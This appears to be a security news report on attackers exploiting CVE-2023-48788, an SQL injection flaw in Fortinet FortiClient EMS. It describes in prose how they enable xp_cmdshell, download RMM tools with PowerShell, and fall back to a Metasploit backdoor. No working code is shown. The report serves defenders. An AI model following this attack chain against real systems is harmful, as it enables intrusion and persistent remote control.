Malicious actors are exploiting a critical vulnerability in the Fortinet FortiClient EMS application to deploy unauthorized Remote Monitoring and Management (RMM) tools and PowerShell backdoors on the target systems.
Tracked as CVE-2023-48788, the flaw is an SQL injection issue that allows a remote non-authenticated attacker to execute arbitrary SQL commands within the application database by sending a specially crafted request.
The attack begins with external IP addresses establishing connections to the FCM daemon process, which operates within the FortiClient EMS application and listens on port 8013 for incoming requests.
Exploiting an unpatched FortiClient EMS application, adversaries can perform SQL injection through specially crafted messages and execute arbitrary commands via cmd.exe by enabling xp_cmdshell.
Upon exploitation and remote code execution, the sqlservr.exe process running from the \MSSQL14.FCEMS\ directory spawns a cmd.exe instance. This allows adversaries to execute commands or run other binaries with SYSTEM-level permissions.
Upon successful exploitation and remote code execution, attackers initiate the downloading of malicious Windows Installer files (.msi) from known malicious IP addresses using PowerShell's Invoke-WebRequest cmdlet. The .msi files were RMM tools such as Atera or ScreenConnect, providing adversaries with remote access and control over compromised devices.
However, in some instances, adversaries encountered difficulties in installing the RMM tools, leading to unsuccessful attempts. In these cases, they resorted to deploying PowerShell backdoors, notably utilizing Metasploit's powerfun.ps1 script.
Red Canary's observations indicate that the threat actor took between 36 seconds and 47 minutes from initial access to the attempt to install an RMM tool or backdoor.